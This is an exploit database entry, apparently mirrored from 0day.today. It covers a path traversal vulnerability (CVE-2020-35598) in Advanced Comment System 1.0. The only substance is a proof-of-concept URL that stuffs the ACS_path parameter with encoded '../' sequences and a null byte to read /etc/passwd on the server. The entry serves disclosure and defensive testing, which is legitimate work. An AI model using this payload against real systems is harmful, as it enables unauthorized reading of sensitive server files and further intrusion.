id: 35591
date: 01/04/2021
title: Advanced Comment System 1.0 - (ACS_path) Path Traversal Vulnerability
author: n0ipr0cs
cves: CVE-2020-35598

# Exploit Title: Advanced Comment System 1.0 - 'ACS_path' Path Traversal
# Exploit Author: Francisco Javier Santiago Vázquez aka "n0ipr0cs"
# Vendor Homepage: Advanced Comment System - ACS
# Version: v1.0
# CVE: CVE-2020-35598

http://localhost/advanced_component_system/index.php?ACS_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00

#  0day.today [2023-03-22]  #